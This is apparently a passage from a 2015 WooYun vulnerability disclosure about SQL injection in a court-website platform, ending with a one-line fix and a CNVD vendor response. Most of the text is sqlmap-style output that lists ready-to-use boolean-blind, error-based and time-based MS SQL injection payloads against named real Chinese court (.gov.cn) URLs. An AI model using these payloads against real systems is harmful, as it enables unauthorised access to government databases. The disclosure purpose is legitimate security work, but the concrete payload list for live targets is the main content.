Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#7:http://sf.hicourt.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 1700=CONVERT(INT,(CHAR(58)+
CHAR(101)+CHAR(98)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (1700=1700) THEN CHAR(4
9) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(122)+CHAR(108)+CHAR(58))) AND 'XJ
Kw'='XJKw
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 3399=3399 AND 'kSEf'='kSEf&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 3945=CONVERT(INT,(CHAR(58)+CHAR(101)+CHAR
(98)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (3945=3945) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(100)+CHAR(122)+CHAR(108)+CHAR(58))) AND 'mxcz'='mxcz&SecM
enuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#8:http://www.ypfy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 7266=CONVERT(INT,(CHAR(58)+
CHAR(122)+CHAR(117)+CHAR(106)+CHAR(58)+(SELECT (CASE WHEN (7266=7266) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(109)+CHAR(114)+CHAR(58))) AND 'v
QMP'='vQMP
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 2600=2600 AND 'UYwU'='UYwU&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 2230=CONVERT(INT,(CHAR(58)+CHAR(122)+CHAR
(117)+CHAR(106)+CHAR(58)+(SELECT (CASE WHEN (2230=2230) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(115)+CHAR(109)+CHAR(114)+CHAR(58))) AND 'mnIS'='mnIS&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#9:http://www.ledongfayuan.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 9259=CONVERT(INT,(CHAR(58)+
CHAR(116)+CHAR(108)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (9259=9259) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(119)+CHAR(100)+CHAR(58))) AND 'q
loP'='qloP
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 7950=7950 AND 'pOHY'='pOHY&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5478=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR
(108)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (5478=5478) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(109)+CHAR(119)+CHAR(100)+CHAR(58))) AND 'yzeV'='yzeV&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#10:http://sf.hkhsfy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 1939=CONVERT(INT,(CHAR(58)+
CHAR(119)+CHAR(113)+CHAR(108)+CHAR(58)+(SELECT (CASE WHEN (1939=1939) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(102)+CHAR(100)+CHAR(113)+CHAR(58))) AND 'w
LFS'='wLFS
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 9854=9854 AND 'NQQi'='NQQi&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5081=CONVERT(INT,(CHAR(58)+CHAR(119)+CHAR
(113)+CHAR(108)+CHAR(58)+(SELECT (CASE WHEN (5081=5081) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(102)+CHAR(100)+CHAR(113)+CHAR(58))) AND 'kWzD'='kWzD&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#11:http://www.wzsfy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=GSXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=GSXW&SecMenuCode=0' AND 4093=CONVERT(INT,(CHAR(58)+
CHAR(122)+CHAR(108)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (4093=4093) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(100)+CHAR(121)+CHAR(58))) AND 'R
OAC'='ROAC
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=GSXW&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=GSXW' AND 2393=2393 AND 'shXW'='shXW&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=GSXW' AND 3328=CONVERT(INT,(CHAR(58)+CHAR(122)+CHAR
(108)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (3328=3328) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(109)+CHAR(100)+CHAR(121)+CHAR(58))) AND 'dAjD'='dAjD&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=GSXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#12:http://www.hkqsfy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 8158=CONVERT(INT,(CHAR(58)+
CHAR(113)+CHAR(113)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (8158=8158) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(106)+CHAR(104)+CHAR(112)+CHAR(58))) AND 'T
XQP'='TXQP
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 6530=6530 AND 'oMKF'='oMKF&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5402=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR
(113)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (5402=5402) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(106)+CHAR(104)+CHAR(112)+CHAR(58))) AND 'cLVD'='cLVD&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#13:http://www.hnbtcourt.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 9924=9924 AND 'sxxn'='sxxn&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 6065=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR
(116)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6065=6065) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(114)+CHAR(99)+CHAR(101)+CHAR(58))) AND 'vjKv'='vjKv&SecMe
nuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 2631=CONVERT(INT,(CHAR(58)+
CHAR(116)+CHAR(116)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2631=2631) THEN CHAR(4
9) ELSE CHAR(48) END))+CHAR(58)+CHAR(114)+CHAR(99)+CHAR(101)+CHAR(58))) AND 'Wfd
J'='WfdJ
---
#14:http://www.chengmaifayuan.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=DZQK&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=DZQK&SecMenuCode=0' AND 6756=CONVERT(INT,(CHAR(58)+
CHAR(98)+CHAR(106)+CHAR(106)+CHAR(58)+(SELECT (CASE WHEN (6756=6756) THEN CHAR(4
9) ELSE CHAR(48) END))+CHAR(58)+CHAR(118)+CHAR(117)+CHAR(108)+CHAR(58))) AND 'gg
lR'='gglR
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=DZQK&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=DZQK' AND 7738=7738 AND 'jXNQ'='jXNQ&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=DZQK' AND 2375=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(
106)+CHAR(106)+CHAR(58)+(SELECT (CASE WHEN (2375=2375) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(118)+CHAR(117)+CHAR(108)+CHAR(58))) AND 'qdWv'='qdWv&SecM
enuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=DZQK' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#15:http://www.dinganfayuan.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5100=5100 AND 'Zefw'='Zefw&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5859=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR
(99)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (5859=5859) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(97)+CHAR(109)+CHAR(120)+CHAR(58))) AND 'ebFc'='ebFc&SecMe
nuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 7129=CONVERT(INT,(CHAR(58)+
CHAR(114)+CHAR(99)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (7129=7129) THEN CHAR(4
9) ELSE CHAR(48) END))+CHAR(58)+CHAR(97)+CHAR(109)+CHAR(120)+CHAR(58))) AND 'eCe
n'='eCen
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
---


法院1.png


法院2.png


法院3.png


法院4.png


法院5.png


法院6.png


法院7.png


法院8.png


法院9.png


法院10.png


法院11.png


法院12.png


法院13.png


法院14.png

修复方案:

禁止拼接字符串。。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-05-19 08:27

厂商回复:

CNVD确认并复现所述情况,同时核实确认软件生产厂商,已经CNVD向软件生产厂商_上海某公司通报,由其后续协调网站管理单位处置.

最新状态:

暂无